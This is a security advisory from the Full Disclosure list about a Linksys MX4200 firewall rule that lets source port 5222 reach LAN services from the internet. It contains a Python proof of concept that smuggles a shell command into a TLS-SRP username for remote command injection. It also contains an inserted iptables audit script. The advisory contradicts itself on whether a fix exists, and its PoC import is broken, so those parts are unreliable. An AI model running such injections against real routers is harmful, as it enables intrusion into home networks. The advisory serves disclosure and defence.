[SYSS-2025-014] Linksys MX4200 - Improper Verification of Source of a Communication Channel
A misconfigured firewall on the Linksys MX4200 router causes connections with source port 5222 to be accepted on the WAN port, exposing LAN services to the internet; the risk level is Critical. The vulnerability can lead to remote attacks and command injection. The manufacturer has released a fix.

2026-2-16 21:0:44 Author: seclists.org


Full Disclosure mailing list archives


From: Christian Zäske via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Feb 2026 11:13:33 +0100

Advisory ID:               SYSS-2025-014
Product:                   MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.13.210200 (and potentially others)
Tested Version(s):         1.0.13.210200 MX4200
Vulnerability Type:        Improper Verification of Source of a Communication Channel (CWE-940)
Risk Level:                Critical
Solution Status:           Fixed
Manufacturer Notification: 2025-03-18
Solution Date:             2025-06-24
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to an improperly configured firewall rule, the router will accept
any connection on the WAN port with the source port 5222, exposing all
services which are normally only accessible through the local network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and potentially other models) contains the following
iptables rules:

  -A INPUT -i eth0 -j wan2self
  -A wan2self -j wan2self_ports
  -A wan2self_ports -p tcp -m tcp --sport 5222 -j xlog_accept_wan2self
  -A xlog_accept_wan2self -j ACCEPT

This chain of rules accepts any incoming packet on eth0 (the WAN port)
that originates from source port 5222. As a result, any service
listening on 0.0.0.0 is exposed to the internet if no additional
firewall is used. This is especially critical because of other
vulnerabilities reported, such as SYSS-2025-009, -010 and -011 (see [2]),
which can ultimately lead to unauthorized OS command injection over the
internet.
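
The rule chain above can be audited mechanically. The following is an added example, not part of the SySS advisory or Linksys firmware: it walks an `iptables -S` dump from INPUT on the WAN interface and reports any path that ends in ACCEPT while matching only a source port. The function names, the `PINNING` set and the second ruleset are assumptions made for illustration.

```python
import shlex
from collections import defaultdict

# Rules quoted in the advisory, in `iptables -S` form.
ADVISORY_RULES = """\
-A INPUT -i eth0 -j wan2self
-A wan2self -j wan2self_ports
-A wan2self_ports -p tcp -m tcp --sport 5222 -j xlog_accept_wan2self
-A xlog_accept_wan2self -j ACCEPT
"""
# Constructed counter-example: replies are admitted by connection state instead.
STATEFUL_RULES = """\
-A INPUT -i eth0 -j wan2self
-A wan2self -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A wan2self -j DROP
"""
# Matches that tie an ACCEPT to something other than the sender-chosen port.
PINNING = {"--dport", "--dports", "--ctstate", "--state", "-s", "--source"}

def parse(ruleset):
    """Map chain name -> list of (match tokens, jump target)."""
    chains = defaultdict(list)
    for line in ruleset.splitlines():
        tok = shlex.split(line)
        if len(tok) >= 4 and tok[0] == "-A" and "-j" in tok:
            j = tok.index("-j")
            chains[tok[1]].append((tok[2:j], tok[j + 1]))
    return chains

def source_port_only_accepts(ruleset, wan_if="eth0"):
    """Return (port, chain path) for WAN paths that ACCEPT on source port alone."""
    chains, findings = parse(ruleset), []

    # Simplification: earlier DROP/RETURN rules and "!" negation are not modelled.
    def walk(chain, matches, path, seen):
        for rule_matches, target in chains.get(chain, []):
            acc, step = matches + rule_matches, path + [chain]
            if target == "ACCEPT":
                if "--sport" in acc and not PINNING & set(acc):
                    findings.append((acc[acc.index("--sport") + 1], step))
            elif target in chains and target not in seen:
                walk(target, acc, step, seen | {target})

    for rule_matches, target in chains.get("INPUT", []):
        if rule_matches[:2] == ["-i", wan_if] and target in chains:
            walk(target, rule_matches, ["INPUT"], {target})
    return findings
```

A source port is chosen by the sender, so a finding here means the rule authenticates nothing; the stateful ruleset admits return traffic without that property.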

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following Python code will exploit SYSS-2025-010 over the internet:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.bind(('0.0.0.0', 5222))
  sock.connect(("203.0.113.100", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP("; . /etc/led/lib_nodes_hw.sh; combo_solid yellow on;", "dummypass")

The only changes compared to SYSS-2025-010 are the fixed source port 5222
and the endpoint, which is no longer the local IP address but the public
IP address that is accessible via the internet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Fix published by manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SYSS-2025-009, SYSS-2025-010 and SYSS-2025-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-011.txt
[3] SySS Security Advisory SYSS-2025-014
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-014.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske () syss de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Attachment: OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Article source: https://seclists.org/fulldisclosure/2026/Feb/19